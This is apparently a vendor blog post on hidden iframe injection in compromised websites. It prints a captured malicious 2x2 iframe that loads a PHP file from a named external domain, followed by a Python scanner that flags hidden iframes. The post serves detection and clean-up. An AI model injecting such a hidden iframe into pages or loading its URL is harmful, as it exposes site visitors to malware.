Sunday, March 24, 2013

Common type of malicious iframe injection

Hidden iframe with malicious redirection

This sort of malicious redirection using hidden iframes is a common threat detected by Quttera's website malware scanner. It is actually very easy to detect for website owners whose website has been compromised.
Submission Date: Sun Mar 24 15:11:13 2013
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]

Snapshot from Quttera's Online Malware Scanner:

As can be seen, the iframe source is actually a .php file:

The path /wp-content/uploads/2011/10/ of a WordPress-based website contains the file update.php, which is loaded by the iframe and executed. Usually, this is done to hide the fact that a file is being loaded and to perform malicious activity in the background.

Furthermore, according to Google Safe Browsing, the domain that hosts this .php file is blacklisted.

To locate this kind of threat on your website, review all of your files and look for a similar iframe pattern.
Of course, website malware monitoring does this automatically, which makes the file clean-up much easier.
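
One way to do that file review by script, added here as an example (it is not Quttera's scanner code): it flags iframes a visitor cannot see, as in the threat dump above, and notes when the source is on another host or is a .php file under an uploads directory. The host names, the 5-pixel threshold and the function names are assumptions.

```python
import os
import re
from urllib.parse import urlparse
MAX_VISIBLE_PX = 5  # assumed threshold: a frame this small is effectively invisible
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def _px(value):
    """Pixel size as int, or None when absent or not a plain number (e.g. 100%)."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return int(m.group(1)) if m else None

def scan_text(text, site_host):
    """Return [(line, src, reasons)] for iframes hidden from the visitor."""
    findings = []
    for tag in IFRAME_RE.finditer(text):
        # Strip backslashes so tags inside PHP/JS strings (width=\"2\") still parse.
        pairs = ATTR_RE.findall(tag.group().replace("\\", ""))
        a = {k.lower(): d or s or u for k, d, s, u in pairs}
        reasons = []
        dims = (_px(a.get("width", "")), _px(a.get("height", "")))
        if any(d is not None and d <= MAX_VISIBLE_PX for d in dims):
            reasons.append("tiny dimensions")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if not reasons:
            continue  # visible frame, e.g. an ordinary video embed
        url = urlparse(a.get("src", ""))
        if url.hostname and url.hostname != site_host.lower():
            reasons.append("external host")
        if "/uploads/" in url.path.lower() and url.path.lower().endswith(".php"):
            reasons.append("php under uploads")
        findings.append((text.count("\n", 0, tag.start()) + 1, a.get("src", ""), reasons))
    return findings

def scan_tree(root, site_host, exts=(".php", ".html", ".htm", ".js")):
    """Yield (path, line, src, reasons) for every matching file below root."""
    for folder, _dirs, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(exts)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in scan_text(fh.read(), site_host):
                    yield (path, *hit)

# Constructed sample: one ordinary embed, one frame shaped like the threat dump.
SAMPLE = """<p>Welcome</p>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<iframe src="http://compromised.example/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0"></iframe>"""
print(scan_text(SAMPLE, "www.mysite.example"))
```

Point `scan_tree` at the web root with the site's own host name to review every template, script and page in one pass; a hit is a lead to inspect by hand, since some legitimate widgets also use tiny frames.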